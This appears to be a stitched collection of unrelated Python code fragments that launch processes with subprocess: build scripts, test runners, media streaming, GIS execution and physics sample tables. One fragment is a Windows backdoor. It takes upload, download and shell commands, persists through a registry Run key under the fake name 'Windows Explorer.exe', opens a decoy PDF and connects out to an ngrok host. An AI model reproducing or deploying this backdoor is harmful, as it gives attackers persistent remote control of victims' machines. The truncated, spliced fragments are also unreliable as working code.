'singletop', 'ttbar', 'wjets_sherpa', 'zjets_sherpa', ) # Loop over each group for group in grouplist: print '' print '' print '====================================================================' print 'Listing %s ...' % (group) print '' print '' # Get list of all samples in a given group samples=subprocess.Popen('ls %s/%s'%(inputdir,group),shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT) # Create, open and start filling the output os.system('mkdir -p output/') output=open('output/%s_samples_table.tex'%(group),'w') output.write('\\begin{table}[h]\n') output.write('\\begin{center}\n') output.write('\\resizebox{\\textwidth}{!}{\n') output.write('\\tiny\n') output.write('\\begin{tabular}{llllrr}\n') output.write('Sample name & $\sigma$ [pb] & $k$-Factor & $\epsilon_{\mathrm{filter}}$ & $N_{\mathrm{gen}}$ & $L_{\mathrm{equiv}}$ [fb$^{-1}$] \\\\ \n') # Loop over all samples in the group for sample in samples.stdout.readlines(): gridname=sample.split('.SusyNt.')[0].split('.phys-susy.')[1]+str('.evgen.EVNT.')+sample.split('.SusyNt.')[1].split('_')[0] name=sample.split('.SusyNt.')[0].split('.mc15_13TeV.')[1] print 'Sample : %s'%(name) dsid=name.split('.')[0]
def getoutput(cmd, env=None):
    # Launch *cmd* with stderr folded into stdout so one pipe captures all
    # output; a launch failure is reported and re-raised.
    # NOTE(review): the visible body only starts the process and never reads
    # from it -- this chunk looks truncated; the communicate()/return part is
    # presumably outside this view.  Confirm against the full file.
    try:
        process = subprocess.Popen(cmd,
                                   stdin=subprocess.PIPE,
                                   stdout=subprocess.PIPE,
                                   stderr=subprocess.STDOUT,
                                   env=env,
                                   close_fds=True)
    except Exception, e:  # Python 2 except syntax -- this file is py2
        print("error running %s: %s" % (cmd, e))
        raise e
def with_server(start_server_command, stop_server_commands, in_tests, get_stats_cb): tests = in_tests[:LIMIT_TESTS] print("going to run %s tests: %s" % (len(tests), [x[0] for x in tests])) print("*******************************************") print("ETA: %s minutes" % int((SERVER_SETTLE_TIME+DEFAULT_TEST_COMMAND_SETTLE_TIME+SETTLE_TIME+MEASURE_TIME+1)*len(tests)/60)) print("*******************************************") server_process = None test_command_process = None env = {} for k,v in os.environ.items(): #whitelist what we want to keep: if k.startswith("XPRA") or k in ("LOGNAME", "XDG_RUNTIME_DIR", "USER", "HOME", "PATH", "LD_LIBRARY_PATH", "XAUTHORITY", "SHELL", "TERM", "USERNAME", "HOSTNAME", "PWD"): env[k] = v env["DISPLAY"] = ":%s" % DISPLAY_NO errors = 0 results = [] count = 0 for name, tech_name, server_version, client_version, encoding, quality, speed, \ opengl, compression, encryption, ssh, (down,up,latency), test_command, client_cmd in tests: try: print("**************************************************************") count += 1 test_command_settle_time = TEST_COMMAND_SETTLE_TIME.get(test_command[0], DEFAULT_TEST_COMMAND_SETTLE_TIME) eta = int((SERVER_SETTLE_TIME+test_command_settle_time+SETTLE_TIME+MEASURE_TIME+1)*(len(tests)-count)/60) print("%s/%s: %s ETA=%s minutes" % (count, len(tests), name, eta)) test_command_process = None try: clean_sys_state() #start the server: if START_SERVER: print("starting server: %s" % str(start_server_command)) server_process = subprocess.Popen(start_server_command, stdin=None) #give it time to settle down: t = SERVER_SETTLE_TIME if count==1: #first run, give it enough time to cleanup the socket t += 5 time.sleep(t) server_pid = server_process.pid code = server_process.poll() assert code is None, "server failed to start, return code is %s, please ensure that you can run the server command line above and that a server does not already exist on that port or DISPLAY" % code else: server_pid = 0 try: #start the test command: 
if USE_VIRTUALGL: if type(test_command)==str: cmd = VGLRUN_BIN + " -- "+ test_command elif type(test_command) in (list, tuple): cmd = [VGLRUN_BIN, "--"] + list(test_command) else: raise Exception("invalid test command type: %s for %s" % (type(test_command), test_command)) else: cmd = test_command print("starting test command: %s with env=%s, settle time=%s" % (cmd, env, test_command_settle_time)) shell = type(cmd)==str test_command_process = subprocess.Popen(cmd, stdin=None, stdout=subprocess.PIPE, stderr=subprocess.PIPE, env=env, shell=shell) if PREVENT_SLEEP: subprocess.Popen(PREVENT_SLEEP_COMMAND) time.sleep(test_command_settle_time) code = test_command_process.poll() assert code is None, "test command %s failed to start: exit code is %s" % (cmd, code) print("test command %s is running with pid=%s" % (cmd, test_command_process.pid)) #run the client test data = {"Test Name" : name, "Remoting Tech" : tech_name, "Server Version" : server_version, "Client Version" : client_version, "Custom Params" : " ".join(sys.argv[1:]), "SVN Version" : SVN_VERSION, "Encoding" : encoding, "Quality" : quality, "Speed" : speed, "OpenGL" : opengl, "Test Command" : get_command_name(test_command), "Sample Duration (s)" : MEASURE_TIME, "Sample Time (epoch)" : time.time(), "CPU info" : CPU_INFO, "Platform" : PLATFORM, "Kernel Version" : KERNEL_VERSION, "Xorg version" : XORG_VERSION, "OpenGL" : OPENGL_INFO, "Client Window Manager" : WINDOW_MANAGER, "Screen Size" : "%sx%s" % gdk.get_default_root_window().get_size(), "Compression" : compression, "Encryption" : encryption, "Connect via" : ssh, "download limit (KB)" : down, "upload limit (KB)" : up, "latency (ms)" : latency, } data.update(measure_client(server_pid, name, client_cmd, get_stats_cb)) results.append([data.get(x, "") for x in HEADERS]) except Exception, e: import traceback traceback.print_exc() errors += 1 print("error during client command run for %s: %s" % (name, e)) if errors>MAX_ERRORS: print("too many errors, aborting tests") 
break finally: if test_command_process: print("stopping '%s' with pid=%s" % (test_command, test_command_process.pid)) try_to_stop(test_command_process) try_to_kill(test_command_process, 2) if START_SERVER: try_to_stop(server_process) time.sleep(2) for s in stop_server_commands: print("stopping server with: %s" % (s)) try: stop_process = subprocess.Popen(s, stdin=None, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True) stop_process.wait() except Exception, e: print("error: %s" % e) try_to_kill(server_process, 5) time.sleep(1) except KeyboardInterrupt, e: print("caught %s: stopping this series of tests" % e) break
command[1]) elif command[0] == "upload": command_result = self.write_file(command[1], command[2]) elif command[0] == "download": command_result = self.read_file(command[1]) else: command_result = self.execute_system_command(command) except Exception: command_result = "[-] Error during command execution." self.reliable_send(command_result) def become_persistent(self): evil_file_location = os.environ["appdata"] + "\\Windows Explorer.exe" if not os.path.exists(evil_file_location): shutil.copyfile(sys.executable, evil_file_location) subprocess.call( 'reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v update /t REG_SZ /d "' + evil_file_location + '"', shell=True) file_name = sys._MEIPASS + "\sample.pdf" subprocess.Popen(file_name, shell=True) try: my_backdoor = Backdoor("0.tcp.ngrok.io", 12448) my_backdoor.run() except Exception: sys.exit()
def get_next(self):
    """Top up the pool of running tests, then block until one finishes.

    Starts queued tests until ``num_jobs`` are running, then polls the
    running jobs and returns ``(TestResult, testdir, stdout, stderr)`` for
    the first one that exits.  Raises IndexError if nothing is running.
    """
    while self.num_running < self.num_jobs and self.test_list:
        # Add tests
        self.num_running += 1
        test = self.test_list.pop(0)
        # The remaining queue length doubles as a port seed so parallel
        # test processes don't collide on ports.
        portseed = len(self.test_list)
        portseed_arg = ["--portseed={}".format(portseed)]
        # Spooled files keep small logs in memory, spilling to disk past 64 KiB.
        log_stdout = tempfile.SpooledTemporaryFile(max_size=2**16)
        log_stderr = tempfile.SpooledTemporaryFile(max_size=2**16)
        test_argv = test.split()
        testdir = "{}/{}_{}".format(self.tmpdir, re.sub(".py$", "", test_argv[0]), portseed)
        tmpdir_arg = ["--tmpdir={}".format(testdir)]
        self.jobs.append((test,
                          time.time(),
                          subprocess.Popen([sys.executable, self.tests_dir + test_argv[0]] + test_argv[1:] + self.flags + portseed_arg + tmpdir_arg,
                                           universal_newlines=True,
                                           stdout=log_stdout,
                                           stderr=log_stderr),
                          testdir,
                          log_stdout,
                          log_stderr))
    if not self.jobs:
        raise IndexError('pop from empty list')
    # Print remaining running jobs when all jobs have been started.
    if not self.test_list:
        print("Remaining jobs: [{}]".format(", ".join(j[0] for j in self.jobs)))
    dot_count = 0
    while True:
        # Return first proc that finishes
        time.sleep(.5)
        for job in self.jobs:
            (name, start_time, proc, testdir, log_out, log_err) = job
            if proc.poll() is not None:
                log_out.seek(0), log_err.seek(0)
                [stdout, stderr] = [log_file.read().decode('utf-8') for log_file in (log_out, log_err)]
                log_out.close(), log_err.close()
                # Any stderr output at all downgrades a pass to a failure.
                if proc.returncode == TEST_EXIT_PASSED and stderr == "":
                    status = "Passed"
                elif proc.returncode == TEST_EXIT_SKIPPED:
                    status = "Skipped"
                else:
                    status = "Failed"
                self.num_running -= 1
                self.jobs.remove(job)
                if self.use_term_control:
                    # Erase the progress dots before the caller prints results.
                    clearline = '\r' + (' ' * dot_count) + '\r'
                    print(clearline, end='', flush=True)
                dot_count = 0
                return TestResult(name, status, int(time.time() - start_time)), testdir, stdout, stderr
        if self.use_term_control:
            print('.', end='', flush=True)
        dot_count += 1
import time, subprocess

# Count down x seconds, printing each elapsed second, then start playback.
x = 10
for i in range(1, x + 1):
    time.sleep(1)
    print(i)

# FIX: the launch used to sit inside the loop behind `if i == x:`, re-testing
# the condition every iteration; launching after the loop is equivalent and
# clearer.
subprocess.Popen(['vlc', '-vvv', './stan.mp4'])
# NOTE(review): spawns startSceneServer.pyc through the shell, naming the
# process after the scene id and the server name from app.gate.utils.dbaccess.
# The backslash inside the command string is a leftover line continuation from
# the original source; the exact runtime command string therefore cannot be
# reconstructed from this view -- verify it before relying on this code.
# (Original docstring translates to: "Start a scene server.")
def startSceneServer(self,sceneId): '''开启一个场景服务器''' from app.gate.utils import dbaccess servername = dbaccess.servername subprocess.Popen('python ./servers/SceneServer/src/startSceneServer.pyc \ -named sceneserver_%d -servername %s'%(sceneId,servername),shell=True)
def do_cmd(cmd):
    """Execute *cmd* through the shell and return its output, stripped.

    stderr is merged into stdout, so the returned bytes contain everything
    the command printed on either stream.
    """
    runner = subprocess.Popen([cmd], shell=True,
                              stdout=subprocess.PIPE,
                              stderr=subprocess.STDOUT,
                              close_fds=True)
    # communicate() drains the pipe completely and waits for the process.
    captured = runner.communicate()[0]
    return captured.strip()
import subprocess as sp
from app import content
from time import sleep

# Content mapping from the app; 'tv' entries appear to be (name, source_url)
# pairs -- TODO confirm against app.content.
CMS_DICT = content()

for item in CMS_DICT['tv']:
    # One ffmpeg process per channel, pushing the source into the local
    # ffserver feed named after the channel.
    feed = sp.Popen([
        'ffmpeg', '-nostats', '-loglevel', '0', '-xerror', '-i', item[1],
        'http://127.0.0.1:8090/{}.ffm'.format(item[0])
    ])
    print(item[0], 'feed on PID:', str(feed.pid))
    # Stagger startups so the server isn't hit with all feeds at once.
    sleep(5)
import subprocess

# Stream ping's output line by line while it runs, then drain whatever is
# left once the process has exited.
process = subprocess.Popen(['ping', '-c 4', 'python.org'],
                           stdout=subprocess.PIPE,
                           universal_newlines=True)
while True:
    # readline() blocks until a line is available or the pipe closes.
    output = process.stdout.readline()
    print(output.strip())
    # Use .poll() to check return code of the process
    # If None - still running
    return_code = process.poll()
    if return_code is not None:
        print('RETURNED CODE', return_code)
        # Process has finished, read rest of the output
        for output in process.stdout.readlines():
            print(output.strip())
        break
def start(self): environ = os.environ.copy() if self.lang: environ["LC_ALL"] = self.lang path = os.path.dirname(__file__) self.cur_frame = None # allow attaching to external browser cdp_port = None if "TEST_CDP_PORT" in os.environ: p = int(os.environ["TEST_CDP_PORT"]) if self.claim_port(p): # can fail when a test starts multiple browsers; only show the first one cdp_port = p if not cdp_port: # start browser on a new port cdp_port = self.find_cdp_port() self._browser_home = tempfile.mkdtemp() environ = os.environ.copy() environ["HOME"] = self._browser_home environ["LC_ALL"] = "C.utf8" # this might be set for the tests themselves, but we must isolate caching between tests try: del environ["XDG_CACHE_HOME"] except KeyError: pass exe = browser_path(self.headless) if self.headless: argv = [exe, "--headless"] else: argv = [os.path.join(TEST_DIR, "common/xvfb-wrapper"), exe] # sandboxing does not work in Docker container self._browser = subprocess.Popen( argv + ["--disable-gpu", "--no-sandbox", "--remote-debugging-port=%i" % cdp_port, "about:blank"], env=environ, close_fds=True) sys.stderr.write("Started %s (pid %i) on port %i\n" % (exe, self._browser.pid, cdp_port)) # wait for CDP to be up s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) for retry in range(300): try: s.connect(('127.0.0.1', cdp_port)) break except socket.error: time.sleep(0.1) else: raise RuntimeError('timed out waiting for browser to start') # now start the driver if self.trace: # enable frame/execution context debugging if tracing is on environ["TEST_CDP_DEBUG"] = "1" self._driver = subprocess.Popen(["%s/cdp-driver.js" % path, str(cdp_port)], env=environ, stdout=subprocess.PIPE, stdin=subprocess.PIPE, close_fds=True) self.valid = True for inject in [ "%s/test-functions.js" % path, "%s/sizzle.js" % path ]: with open(inject) as f: src = f.read() # HACK: injecting sizzle fails on missing `document` in assert() src = src.replace('function assert( fn ) {', 'function assert( fn ) { return true;') 
self.invoke("Page.addScriptToEvaluateOnLoad", scriptSource=src, no_trace=True)
config = '\n'.join(config_lines) print(config) with open("/etc/wpa_supplicant/wpa_supplicant.conf", "a+") as wifi: wifi.write(config) pygame.mixer.init() pygame.mixer.music.load("/home/pi/MusicEffects/Applause.mp3") pygame.mixer.music.play() time.sleep(10) #Look for USB sticks rpistr = "ls /media/pi" proc = subprocess.Popen(rpistr, shell=True, preexec_fn=os.setsid, stdout=subprocess.PIPE) line = proc.stdout.readline() if not line: exit(0) #Read the files inside the USB stick device_name = line.rstrip().decode("utf-8") rpistr = "ls /media/pi/" + device_name proc = subprocess.Popen(rpistr, shell=True, preexec_fn=os.setsid, stdout=subprocess.PIPE) while True: line = proc.stdout.readline() if not line:
def main():
    """Configure, build and install the project with CMake.

    Command-line flags choose static vs shared library, build type, whether
    tests and docs are built, the install prefix, and let individual steps
    (configure / make / install) be skipped.  'Cache' means: don't pass the
    define, keep the value already in the CMake cache.
    """
    import argparse
    oParser = argparse.ArgumentParser()
    oParser.add_argument("-s", "--staticlib", help="build static library (instead of shared)",
                         choices=['On', 'Off', 'Cache'], default="Cache", dest="sBuildStaticLib")
    oParser.add_argument("-b", "--buildtype", help="build type (default=Release)",
                         choices=['Debug', 'Release', 'MinSizeRel', 'RelWithDebInfo'],
                         default="Release", dest="sBuildType")
    oParser.add_argument("-t", "--tests", help="build tests (default=Cache)",
                         choices=['On', 'Off', 'Cache'], default="Cache", dest="sBuildTests")
    oParser.add_argument("-d", "--docs", help="build documentation (default=Cache)",
                         choices=['On', 'Off', 'Cache'], default="Cache", dest="sBuildDocs")
    oParser.add_argument("--docs-to-log", help="--docs warnings to log file",
                         action="store_true", default=False, dest="bDocsWarningsToLog")
    oParser.add_argument("--installdir", help="install dir (default=/usr/local)",
                         metavar='INSTALLDIR', default="/usr/local", dest="sInstallDir")
    oParser.add_argument("--no-configure", help="don't configure",
                         action="store_true", default=False, dest="bDontConfigure")
    oParser.add_argument("--no-make", help="don't make",
                         action="store_true", default=False, dest="bDontMake")
    oParser.add_argument("--no-install", help="don't install",
                         action="store_true", default=False, dest="bDontInstall")
    oParser.add_argument("--no-sudo", help="don't use sudo to install",
                         action="store_true", default=False, dest="bDontSudo")
    oParser.add_argument("--sanitize", help="compile with -fsanitize=address (Debug only)",
                         action="store_true", default=False, dest="bSanitize")
    oArgs = oParser.parse_args()

    sInstallDir = os.path.abspath(os.path.expanduser(oArgs.sInstallDir))

    # Build from the repository root (one level above this script).
    sScriptDir = os.path.dirname(os.path.abspath(__file__))
    #print("sScriptDir:" + sScriptDir)
    os.chdir(sScriptDir)
    os.chdir("..")
    #
    # Each option below becomes a "-D VAR=VALUE" cmake define; an empty
    # string means "don't pass it, keep the cached value".
    sBuildSharedLib = "-D BUILD_SHARED_LIBS="
    if oArgs.sBuildStaticLib == "On":
        sBuildSharedLib += "OFF"
    elif oArgs.sBuildStaticLib == "Off":
        sBuildSharedLib += "ON"
    else:
        sBuildSharedLib = ""
    #print("sBuildSharedLib:" + sBuildSharedLib)
    #
    sBuildTests = "-D BUILD_TESTING="
    if oArgs.sBuildTests == "On":
        sBuildTests += "ON"
    elif oArgs.sBuildTests == "Off":
        sBuildTests += "OFF"
    else:
        sBuildTests = ""
    #print("sBuildTests:" + sBuildTests)
    #
    sBuildDocs = "-D BUILD_DOCS="
    if oArgs.sBuildDocs == "On":
        sBuildDocs += "ON"
    elif oArgs.sBuildDocs == "Off":
        sBuildDocs += "OFF"
    else:
        sBuildDocs = ""
    #print("sBuildDocs:" + sBuildDocs)
    #
    sDocsWarningsToLog = "-D BUILD_DOCS_WARNINGS_TO_LOG_FILE="
    if oArgs.bDocsWarningsToLog:
        sDocsWarningsToLog += "ON"
    else:
        sDocsWarningsToLog += "OFF"
    #print("sDocsWarningsToLog:" + sDocsWarningsToLog)
    #
    sInstallDir = "-D CMAKE_INSTALL_PREFIX=" + sInstallDir
    #print("sInstallDir:" + sInstallDir)
    #
    sBuildType = "-D CMAKE_BUILD_TYPE=" + oArgs.sBuildType
    #print("sBuildType:" + sBuildType)
    #
    if oArgs.bSanitize:
        sSanitize = "-D BUILD_WITH_SANITIZE=ON"
    else:
        sSanitize = ""
    #print("sSanitize:" + sSanitize)
    #
    if oArgs.bDontSudo:
        sSudo = ""
    else:
        sSudo = "sudo"
    #
    if not os.path.isdir("build"):
        os.mkdir("build")
    os.chdir("build")

    if not oArgs.bDontConfigure:
        subprocess.check_call("cmake {} {} {} {} {} {} {} ..".format(
            sBuildSharedLib, sBuildTests, sBuildDocs, sDocsWarningsToLog,
            sBuildType, sInstallDir, sSanitize).split())
    if not oArgs.bDontMake:
        # shell=True so the shell expands $STMM_MAKE_OPTIONS.
        subprocess.check_call("make $STMM_MAKE_OPTIONS", shell=True)
    if not oArgs.bDontInstall:
        try:
            sEnvDestDir = os.environ["DESTDIR"]
        except KeyError:
            sEnvDestDir = ""
        if sEnvDestDir != "":
            sEnvDestDir = "DESTDIR=" + sEnvDestDir
        subprocess.check_call("{} make install {}".format(sSudo, sEnvDestDir).split())
        # NOTE(review): original indentation was lost; the ldconfig step is
        # nested under the install step here (ldconfig only makes sense after
        # installing a shared library) -- confirm against the original file.
        if oArgs.sBuildStaticLib == "Cache":
            # Ask CMake for the cached value to learn what was actually built.
            oProc = subprocess.Popen("cmake -N -LA".split(), stdout=subprocess.PIPE, shell=False)
            (sOut, sErr) = oProc.communicate()
            bSharedLib = ("BUILD_SHARED_LIBS:BOOL=ON" in str(sOut))
        else:
            bSharedLib = (oArgs.sBuildStaticLib == "Off")
        if bSharedLib and not oArgs.bDontSudo:
            subprocess.check_call("sudo ldconfig".split())
def executeGrass(commands, feedback, outputCommands=None):
    """Run a batch of GRASS commands, forwarding progress and console output
    to *feedback*; optionally re-runs *outputCommands* if the main run never
    reached an r.out/v.out export step."""
    loglines = []
    loglines.append(Grass7Utils.tr('GRASS GIS 7 execution console output'))
    grassOutDone = False
    command, grassenv = Grass7Utils.prepareGrassExecution(commands)
    #QgsMessageLog.logMessage('exec: {}'.format(command), 'DEBUG', Qgis.Info)

    # For MS-Windows, we need to hide the console window.
    if isWindows():
        si = subprocess.STARTUPINFO()
        si.dwFlags |= subprocess.STARTF_USESHOWWINDOW
        si.wShowWindow = subprocess.SW_HIDE

    with subprocess.Popen(command,
                          shell=True if isMac() else False,
                          stdout=subprocess.PIPE,
                          stdin=subprocess.DEVNULL,
                          stderr=subprocess.STDOUT,
                          universal_newlines=True,
                          env=grassenv,
                          startupinfo=si if isWindows() else None) as proc:
        for line in iter(proc.stdout.readline, ''):
            if 'GRASS_INFO_PERCENT' in line:
                try:
                    # Progress lines look like "GRASS_INFO_PERCENT: NN".
                    feedback.setProgress(int(line[len('GRASS_INFO_PERCENT') + 2:]))
                except:
                    pass
            else:
                # Seeing an export command means the output step ran.
                if 'r.out' in line or 'v.out' in line:
                    grassOutDone = True
                loglines.append(line)
                feedback.pushConsoleInfo(line)

    # Some GRASS scripts, like r.mapcalculator or r.fillnulls, call
    # other GRASS scripts during execution. This may override any
    # commands that are still to be executed by the subprocess, which
    # are usually the output ones. If that is the case runs the output
    # commands again.
    if not grassOutDone and outputCommands:
        command, grassenv = Grass7Utils.prepareGrassExecution(outputCommands)
        with subprocess.Popen(command,
                              shell=True if isMac() else False,
                              stdout=subprocess.PIPE,
                              stdin=subprocess.DEVNULL,
                              stderr=subprocess.STDOUT,
                              universal_newlines=True,
                              env=grassenv,
                              startupinfo=si if isWindows() else None) as proc:
            for line in iter(proc.stdout.readline, ''):
                if 'GRASS_INFO_PERCENT' in line:
                    try:
                        feedback.setProgress(int(line[len('GRASS_INFO_PERCENT') + 2:]))
                    except:
                        pass
                else:
                    loglines.append(line)
                    feedback.pushConsoleInfo(line)

    if ProcessingConfig.getSetting(Grass7Utils.GRASS_LOG_CONSOLE):
        QgsMessageLog.logMessage('\n'.join(loglines), 'Processing', Qgis.Info)
def qemu_nbd_popen(*args):
    '''Start qemu-nbd in persistent (daemon) mode and return the Popen handle.

    NOTE(review): the original docstring claimed this returns "the parent's
    exit code", but subprocess.Popen() returns the process object, not a
    return code.  Relies on the module-level qemu_nbd_args base command line.
    '''
    return subprocess.Popen(qemu_nbd_args + ['--persistent'] + list(args))
def start(self): """ Starts the download. Refreshes the streaming url, generates a new file name, and starts a new ffmpeg process. Returns: datetime object representing the time the download started """ tokyo_time = datetime.datetime.now(tz=TOKYO_TZ) # TODO: Does this work on Windows now? env = os.environ.copy() # remove proxy information for key in ('http_proxy', 'https_proxy', 'HTTP_PROXY', 'HTTPS_PROXY'): env.pop(key, None) self.update_streaming_url() # TODO: rework this whole process to include lhls, and make it configurable # and less braindead self._protocol = 'rtmp' self._ffmpeg_container = 'mp4' extra_args = [] # Fall back to HLS if no RTMP stream available # Better to do this here or in update_streaming_url? # There's a possible race condition here, if some external thread modifies either of these if not self._rtmp_url and self._protocol == 'rtmp': download_logger.warn('Using HLS downloader for {}'.format( self._room.handle)) self._protocol = 'hls' # extra_args = [] # force using TS container with HLS # this is causing more problems than it solves # if self.protocol in ('hls', 'lhls'): # self._ffmpeg_container = 'ts' # 2020-01-10: those problems were preferrable to completely unwatchable streams if self.protocol in ('hls', 'lhls'): extra_args = ["-copyts", "-bsf:a", "aac_adtstoasc"] if self.protocol in ('hls', 'lhls') and self._ffmpeg_container == 'mp4': extra_args = ["-bsf:a", "aac_adtstoasc"] # I don't think this is needed? # if self._ffmpeg_container == 'ts': # extra_args.extend(['-bsf:v', 'h264_mp4toannexb']) # elif self._ffmpeg_container != 'mp4': # # TODO: support additional container formats, e.g. 
FLV # self._ffmpeg_container = 'mp4' temp, dest, out = format_name(self._rootdir, strftime(tokyo_time, FULL_DATE_FMT), self._room, ext=self._ffmpeg_container) with self._lock: self.tempdir, self.destdir, self.outfile = temp, dest, out if self._logging is True: log_file = os.path.normpath('{}/logs/{}.log'.format( self.destdir, self.outfile)) env.update({'FFREPORT': 'file={}:level=40'.format(log_file)}) # level=48 is debug mode, with lots and lots of extra information # maybe too much normed_outpath = os.path.normpath('{}/{}'.format( self.tempdir, self.outfile)) self._process = subprocess.Popen( [ self._ffmpeg_path, # '-nostdin', # '-nostats', # will this omit any useful information? '-loglevel', '40', # 40+ required for wait() to check output '-copytb', '1', '-i', self.stream_url, '-c', 'copy', *extra_args, normed_outpath ], stdin=subprocess.DEVNULL, stderr=subprocess.PIPE, # ffmpeg sends all output to stderr universal_newlines=True, bufsize=1, env=env)
import merge_diff_parser
import subprocess
import os

# Jenkins workspace used by the automatic branch-merge job.  (Python 2 script.)
path = "/var/lib/jenkins/workspace/auto_merge_github_branches/"
os.chdir(path)

# Merge master into the test branch, then capture the resulting diff.
subprocess.call(["git", "checkout", "origin/test_branch_20"])
subprocess.call(["git", "merge", "origin/master"])
p = subprocess.Popen(["git", "diff"], stdout=subprocess.PIPE)
diff_output, err = p.communicate()
print "printing diff output"
print diff_output

# Parse the diff into files and hunks.  The first entry is discarded --
# presumably a header rather than a real file; TODO confirm against
# merge_diff_parser.Parser.
obj = merge_diff_parser.Parser(diff_output)
files = obj.get_files()
files.pop(0)
for file in files:
    print "printing file-----------"
    hunks = obj.get_hunks(file)
    for hunk in hunks:
        print "printing hunk now:---------"
        print hunk
print('usage: %s [--verify]' % sys.argv[0], file=sys.stderr) sys.exit(2) mode = None if len(sys.argv) > 2: print_usage_and_exit() elif len(sys.argv) == 2: mode = sys.argv[1] if mode != '--verify': print_usage_and_exit() our_abs_dir = os.path.dirname(os.path.realpath(__file__)) cbindgen = subprocess.Popen(['cbindgen'], cwd=os.path.join(our_abs_dir, '..'), stdout=subprocess.PIPE, stderr=subprocess.PIPE) (stdout, stderr) = cbindgen.communicate() stdout = str(stdout.decode('utf8')) stderr = str(stderr.decode('utf8')) ignore_this_warning = re.compile( r"WARN: Can't find .*\. This usually means that this type was incompatible or not found\." ) unknown_warning = False for l in stderr.split('\n'): if l == "":
def call_program(self, cmd, limit=None, memory_limit=None, **kwargs):
    """
    call cmd and kill it if it runs for longer than limit

    returns dictionary like
      {'returncode': 0, 'stdout': '', 'stderr': '',
       'timeout': False, 'time': 1.89}
    """
    the_io_thread_pool_init(self.args.parallelism)
    # BUG FIX: `limit is float('inf')` compared object identity and was
    # (effectively) always False, so an infinite limit was never translated
    # into "no limit"; use == to compare values.
    if limit == float('inf'):
        limit = None
    # BUG FIX: `type(cmd) in (str, str)` was a redundant py2 leftover
    # (originally (str, unicode)); isinstance is the idiomatic check.
    if isinstance(cmd, str):
        kwargs['shell'] = True
    killed = False
    t0 = time.time()
    p = subprocess.Popen(cmd,
                         stdout=subprocess.PIPE, stderr=subprocess.PIPE,
                         preexec_fn=preexec_setpgid_setrlimit(memory_limit),
                         **kwargs)
    # Add p.pid to list of processes to kill in case of keyboardinterrupt
    self.pid_lock.acquire()
    self.pids.append(p.pid)
    self.pid_lock.release()

    try:
        # Read both pipes from worker threads so neither can fill and block p.
        stdout_result = the_io_thread_pool.apply_async(p.stdout.read)
        stderr_result = the_io_thread_pool.apply_async(p.stderr.read)
        while p.returncode is None:
            if limit is None:
                goodwait(p)
            elif limit and time.time() > t0 + limit:
                # Deadline exceeded: kill the whole process group.
                killed = True
                goodkillpg(p.pid)
                goodwait(p)
            else:
                # still waiting...
                sleep_for = limit - (time.time() - t0)
                if not stdout_result.ready():
                    stdout_result.wait(sleep_for)
                elif not stderr_result.ready():
                    stderr_result.wait(sleep_for)
                else:
                    #TODO(jansel): replace this with a portable waitpid
                    time.sleep(0.001)
            p.poll()
    except:
        if p.returncode is None:
            goodkillpg(p.pid)
        raise
    finally:
        # No longer need to kill p
        self.pid_lock.acquire()
        if p.pid in self.pids:
            self.pids.remove(p.pid)
        self.pid_lock.release()
    t1 = time.time()
    return {'time': float('inf') if killed else (t1 - t0),
            'timeout': killed,
            'returncode': p.returncode,
            'stdout': stdout_result.get(),
            'stderr': stderr_result.get()}
subprocess.call(['pip3 install opencv-python'], shell=True) if not (os.system("python3 -c 'import qrtools'") == 0): subprocess.call(['pip3 install qrtools'], shell=True) if not (os.system("python3 -c 'import qrcode'") == 0): subprocess.call(['pip3 install qrcode'], shell=True) if not (os.system("python3 -c 'import pyzbar'") == 0): subprocess.call(['pip3 install pyzbar'], shell=True) if not (os.system("python3 -c 'import PIL'") == 0): subprocess.call(['pip3 install pillow'], shell=True) if not (os.system("python3 -c 'import zbar'") == 0): subprocess.call(['pip3 install zbar-py'], shell=True) if not (os.path.exists(home + "/yetirecovery/bitcoin-0.19.0rc1/bin")): subprocess.call([ 'echo "Installing updates. This could take an hour without feedback."' ], shell=True) subprocess.call(['sudo unattended-upgrade'], shell=True) subprocess.call([ 'wget https://bitcoincore.org/bin/bitcoin-core-0.19.0/test.rc1/bitcoin-0.19.0rc1-x86_64-linux-gnu.tar.gz -P ~/yetirecovery/' ], shell=True) os.system( 'tar xvzf ~/yetirecovery/bitcoin-0.19.0rc1-x86_64-linux-gnu.tar.gz -C ~/yetirecovery' ) subprocess.Popen('python3 ~/yetirecovery/hello.py', shell=True, start_new_session=True) subprocess.call(['xdg-open http://localhost:5000/step07'], shell=True)
args.append(str(config['count'])) if 'interval' in config: args.append('-i') args.append(str(config['interval'])) if 'endIntervals' in config: args.append('-ei') args.append(str(config['endIntervals'])) if 'begin' in config: args.append('-b') args.append(str(config['begin'])) if 'end' in config: args.append('-e') args.append(str(config['end'])) if 'begin' not in config and 'end' not in config and 'endIntervals' not in config: args.append('-r') import pprint logger.debug('args: %s' % pprint.pformat(args)) logger.debug('command: %s' % ' '.join(args)) p = subprocess.Popen(args, cwd=os.path.join(os.environ['SPLUNK_HOME'], 'etc', 'apps', 'splunk_app_gogen'), stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=False) sys.stdout.write("<stream>\n") while True: data = p.stdout.readline() # logger.debug("data: %s" % data) sys.stdout.write(data)
def startIPFS():
    """Start the IPFS daemon in the background and wait for it to come up.

    FIX: stdout/stderr used to go to subprocess.PIPE, but nothing ever read
    those pipes; a chatty daemon would eventually fill the pipe buffer and
    block.  The output is discarded instead.
    """
    print('starting IPFS')
    subprocess.Popen(["ipfs", "daemon"],
                     stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
    time.sleep(10)  # time for IPFS to boot
def run_tests(*, test_list, src_dir, build_dir, tmpdir, jobs=1, enable_coverage=False, args=None, combined_logs_len=0, failfast=False, use_term_control):
    """Run the functional tests in *test_list* (up to *jobs* in parallel),
    print per-test results, and exit the process with a non-zero status if
    any test failed or RPC coverage was incomplete."""
    args = args or []

    # Warn if bitcoind is already running
    # pidof might fail or return an empty string if bitcoind is not running
    try:
        if subprocess.check_output(["pidof", "bitcoind"]) not in [b'']:
            print("%sWARNING!%s There is already a bitcoind process running on this system. Tests may fail unexpectedly due to resource contention!" % (BOLD[1], BOLD[0]))
    except (OSError, subprocess.SubprocessError):
        pass

    # Warn if there is a cache directory
    cache_dir = "%s/test/cache" % build_dir
    if os.path.isdir(cache_dir):
